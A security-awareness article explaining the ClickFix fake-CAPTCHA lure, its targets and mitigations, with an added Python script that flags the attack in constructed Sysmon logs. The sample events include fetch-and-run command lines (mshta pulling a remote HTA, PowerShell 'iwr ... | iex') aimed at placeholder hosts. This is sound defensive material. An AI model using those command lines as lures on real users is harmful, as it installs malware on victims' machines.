Cybercriminals have taken a classic security feature, CAPTCHAs, and turned it into a clever trap. The ClickFix attack tricks users into proving that they are “not a robot” by following keyboard commands that secretly download malware onto their devices. This particular scam usually starts with a website popup that looks something like this:

Instead of checking for bots, this fake CAPTCHA guides users through three simple but dangerous steps:

- Pressing the key with the Windows logo together with “R” opens the Windows “Run” dialog, which executes whatever command is typed (or pasted) into it, whether that is an installed program or a system utility.
- Pressing “CTRL” and “V” at the same time pastes a command the page has already placed on the user’s clipboard. The fake CAPTCHA does this silently with JavaScript, so the victim never sees the command before it lands in the Run box.
- Pressing “Enter” runs that command, which calls “mshta.exe,” a built-in Windows program for running Microsoft HTML Application (.hta) files. Given a URL, mshta.exe fetches the attacker’s HTA from the internet and executes the script inside it, and that script downloads and launches the actual malware.
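The three keystrokes above leave a very recognizable trace in process-creation telemetry: mshta.exe (or another script host) spawned by explorer.exe, the process behind the Run dialog, with a URL on its command line. The script below is an added example, not part of the original article, showing how a detection team could scan Sysmon Event ID 1 messages for that pattern. The log messages, hostnames and user names are constructed for illustration; the rule also flags PowerShell and other script hosts launched the same way, which goes slightly beyond the mshta.exe-only chain described in the text.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed Sysmon Event ID 1 (Process Create) messages in the
# "Key: value" layout Sysmon renders. These are made-up samples for the
# example, not records from a real incident.
SAMPLE_EVENTS = [
    # 1. The ClickFix chain from the article: Run dialog -> mshta.exe -> remote HTA
    r"""Process Create:
UtcTime: 2025-03-10 14:02:11.123
Image: C:\Windows\System32\mshta.exe
CommandLine: mshta https://captcha-verify.example/robot.hta # I am not a robot - reCAPTCHA Verification ID: 7411
ParentImage: C:\Windows\explorer.exe
User: CORP\jdoe""",
    # 2. Benign: an installer running a local HTA, no network URL
    r"""Process Create:
UtcTime: 2025-03-10 14:05:40.551
Image: C:\Windows\System32\mshta.exe
CommandLine: mshta "C:\Program Files\Vendor\setup.hta"
ParentImage: C:\Windows\System32\msiexec.exe
User: NT AUTHORITY\SYSTEM""",
    # 3. Variant lure: same Run-dialog paste, but PowerShell instead of mshta
    r"""Process Create:
UtcTime: 2025-03-10 14:09:02.004
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell -w hidden -c "iwr https://fix-error.example/x.ps1 | iex"
ParentImage: C:\Windows\explorer.exe
User: CORP\asmith""",
    # 4. Benign: a user opening Notepad from the Start menu
    r"""Process Create:
UtcTime: 2025-03-10 14:10:15.300
Image: C:\Windows\System32\notepad.exe
CommandLine: "C:\Windows\System32\notepad.exe"
ParentImage: C:\Windows\explorer.exe
User: CORP\jdoe""",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Other hosts a pasted Run-dialog command commonly invokes (assumed set).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "curl.exe"}


@dataclass
class Finding:
    severity: str
    reason: str
    user: str
    command_line: str


def parse_sysmon_message(text: str) -> dict:
    """Turn Sysmon's 'Key: value' message lines into a dict (first ': ' splits)."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(fields: dict) -> Optional[Finding]:
    """Apply the ClickFix rule to one parsed Process Create event."""
    image = basename(fields.get("Image", ""))
    parent = basename(fields.get("ParentImage", ""))
    cmd = fields.get("CommandLine", "")
    url = URL_RE.search(cmd)
    # The Run dialog is owned by Explorer, so its children have explorer.exe as parent.
    from_run_dialog = parent == "explorer.exe"

    if image == "mshta.exe" and url:
        severity = "high" if from_run_dialog else "medium"
        return Finding(severity, f"mshta.exe fetching remote HTA {url.group()} (parent {parent})",
                       fields.get("User", ""), cmd)
    if from_run_dialog and image in SCRIPT_HOSTS and url:
        return Finding("medium", f"{image} launched from Explorer with a URL on the command line",
                       fields.get("User", ""), cmd)
    return None


def scan(messages) -> list:
    """Run the rule over a batch of raw Sysmon messages and collect findings."""
    findings = []
    for message in messages:
        finding = evaluate(parse_sysmon_message(message))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity.upper()}] {f.user}: {f.reason}\n    {f.command_line}")
```

Only events 1 and 3 fire; the installer's local HTA and the Notepad launch stay quiet. When triaging a hit, the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU usually still holds the full pasted command, including the fake "I am not a robot" comment the lure appends to make it look legitimate.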
This might sound familiar because ClickFix is the modern cousin of the old Microsoft Office macro scams. Those were abused so widely that Microsoft now blocks macros in documents downloaded from the internet by default, so attackers have found a new way to get users to install the malware themselves: instead of clicking “Enable Content,” the victim pastes and runs the command with their own hands, which sidesteps the download-time warnings that would otherwise appear.
Who’s Being Targeted?
- Hospitality workers are being lured in by fake Booking.com emails referencing bad reviews or guest requests.
- Healthcare professionals have been redirected to ClickFix attacks from compromised physical therapy websites.
- Random web visitors are encountering spoofed Google Chrome error pages and fake Facebook pop-ups.
How to Avoid the ClickFix Trap
🚫 Don’t follow sketchy CAPTCHA instructions. Real ones never ask you to press Windows + R, open a terminal, or paste anything!
🚫 Be cautious with urgent emails. If an email pressures you to fix an issue or respond to a complaint, verify it first.
🚫 Use security settings. Organizations can disable the “Run” dialog through Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > “Remove Run menu from Start Menu”), which also disables the Windows + R shortcut. Treat that as one layer, not a complete fix: the same pasted command works in a PowerShell window, so also restrict mshta.exe with AppLocker or Windows Defender Application Control on machines that have no business running HTML applications, and alert on mshta.exe or PowerShell being launched from Explorer with a URL on the command line.
ClickFix proves that cybercriminals will go to great lengths to make malware look like just another routine click. But with awareness and caution, you won’t fall for the "fix" that actually breaks everything.